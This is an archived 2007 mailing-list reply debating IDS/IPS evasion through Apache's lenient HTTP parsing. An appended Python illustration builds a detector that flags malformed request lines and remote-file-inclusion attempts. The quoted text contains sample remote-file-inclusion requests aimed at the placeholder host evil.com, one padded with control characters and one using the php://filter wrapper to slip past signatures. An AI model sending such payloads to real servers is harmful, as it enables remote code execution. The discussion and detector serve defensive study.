Message-ID: <1479251011.20070620175055@SECURITY.NNOV.RU>
Date: Wed, 20 Jun 2007 17:50:55 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: "Jamie Riden" <jamie.riden@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: IPS Evasion with the Apache HTTP Server
Dear Jamie Riden,
--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to 3APA3A@...urity.nnov.ru:
JR> (This is what I gathered from the original posting, but I might be wrong.)
JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,
The original BreakingPoint article the author refers to says "The intent is
to describe the strange behaviors of network applications". It mentions
no IPS products, only IIS and Apache. And at least one case of
Apache behavior is partially expected (because of the RFC) and already
described (by Michal Majchrowicz).
JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:
JR> \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n
IPS may detect known attacks. Just like antivirus, you may use IPS to
protect against known viruses/exploits. The ability to bypass IPS with
a new one is not a bug. I do collect different content filtering bypass
methods:
http://securityvulns.com/advisories/content.asp
You simply MUST accept the risk that there is always a way to bypass
content filtering. An IPS alone doesn't protect your network by itself. IPS
is nothing but a tool.
JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request", when it should actually be alerting that a
JR> RFI attempt was made.
In this situation the IDS/IPS should alert that an unsupported request attempt was
made, and block the attempt in the case of an IPS.
JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that a RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )
I can write a buggy application, and an attempt to exploit it will never be
detected by existing signatures.
--
~/ZARAZA http://securityvulns.com/
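As an added illustration of the point argued in this thread (not code from the thread, from Apache or from any IDS product): a toy Python inspector that tokenizes the request line in the lenient way the thread describes, raises an alert when the method or version is unsupported instead of silently dropping the packet, and runs the RFI checks on the recovered target so that both the plain http:// include and the php://filter wrapper are caught. The lenient-tokenizer rules, the method set and the signature names are assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumed lenient tokenizer modelled on the behaviour the thread describes:
# leading empty lines are skipped and any C isspace() byte (including \x0b
# and \x0c, not only SP/HT) separates the request-line tokens.
_SEP = re.compile(rb"[ \t\x0b\x0c]+")
_KNOWN_METHODS = {b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS", b"TRACE"}

# Constructed signatures: an http(s):// include target, and the php://filter
# wrapper mentioned in the thread, which a bare "http://" signature misses.
_RFI_PATTERNS = [
    ("rfi-http-include", re.compile(rb"=\s*https?://", re.I)),
    ("rfi-php-filter-wrapper", re.compile(rb"=\s*php://filter/", re.I)),
]


def lenient_request_line(raw: bytes):
    """Tokenize the first non-empty line the way a lenient server would."""
    body = raw.lstrip(b"\r\n")               # ignore empty lines before the Request-Line
    line = re.split(rb"\r?\n", body, 1)[0]   # request line ends at the first line break
    tokens = [t for t in _SEP.split(line) if t]
    if _SEP.match(line):                     # line starts with a separator: the method is empty
        tokens.insert(0, b"")
    if len(tokens) < 3:
        return None
    return tokens[0], tokens[1], tokens[2]


def inspect_request(raw: bytes):
    """Return the list of alert names for one raw request (empty if nothing matched)."""
    parsed = lenient_request_line(raw)
    if parsed is None:
        return ["malformed-request"]
    method, target, version = parsed
    alerts = []
    # A strict parser stops here and drops the packet; the thread argues the
    # IDS/IPS should alert on an unsupported request instead of ignoring it.
    if method not in _KNOWN_METHODS or not version.startswith(b"HTTP/"):
        alerts.append("unsupported-request-line")
    decoded = unquote_to_bytes(target)       # undo %xx encoding before matching
    for name, pattern in _RFI_PATTERNS:
        if pattern.search(decoded):
            alerts.append(name)
    return alerts
```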
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/